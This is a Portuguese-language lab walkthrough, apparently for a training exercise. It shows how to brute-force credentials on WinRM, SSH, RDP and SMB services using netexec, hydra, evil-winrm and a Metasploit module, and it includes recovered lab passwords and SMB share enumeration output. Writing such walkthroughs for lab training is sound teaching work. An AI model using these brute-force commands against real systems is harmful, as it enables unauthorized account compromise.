# Questions
1. Localize o usuário do serviço WinRM e descubra a senha dele. Depois, ao fazer login, você encontrará a flag em um arquivo. Envie a flag encontrada como resposta.
* Quebra de senha com o `netexec`
```
netexec winrm $myip -u username.list -p password.list
```
* Usar a ferramenta evil-winrm para estabelecer uma sessão do Powershell
```
evil-winrm -i $myip -u john -p "november"
```
***
2. Encontre o usuário do serviço SSH e descubra a senha dele. Depois, ao fazer login, você encontrará a flag em um arquivo. Envie a flag encontrada como resposta.
* Quebra de senha com a ferramenta hydra
```
hydra -L username.list -P password.list ssh://$myip
```
* Em seguida, devemos fazer login via ssh
***
3. Localize o usuário do serviço RDP e descubra a senha dele. Depois, ao fazer login, você encontrará a flag em um arquivo. Envie a flag encontrada como resposta.
* Quebra de senha com a ferramenta `netexec`
```
netexec rdp $myip -u username.list -p password.list
```
* Em seguida, devemos fazer login com a ferramenta `remmina`
***
4. Localize o usuário do serviço SMB e descubra a senha dele. Depois, ao fazer login, você encontrará a flag em um arquivo. Envie a flag encontrada como resposta.
* Quebrar a senha com o modulo `scanner/smb/smb_login` no metasploit
* Enumeração de compartilhamento, com a ferramenta `netexec`
```
netexec smb 10.129.13.232 -u "cassie" -p "12345678910" --shares
SMB 10.129.13.232 445 WINSRV [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.13.232 445 WINSRV [+] WINSRV\cassie:12345678910
SMB 10.129.13.232 445 WINSRV [*] Enumerated shares
SMB 10.129.13.232 445 WINSRV Share Permissions Remark
SMB 10.129.13.232 445 WINSRV ----- ----------- ------
SMB 10.129.13.232 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.13.232 445 WINSRV C$ Default share
SMB 10.129.13.232 445 WINSRV CASSIE READ,WRITE
SMB 10.129.13.232 445 WINSRV IPC$ READ Remote IPC
```
* Conectar-se ao compartilhado
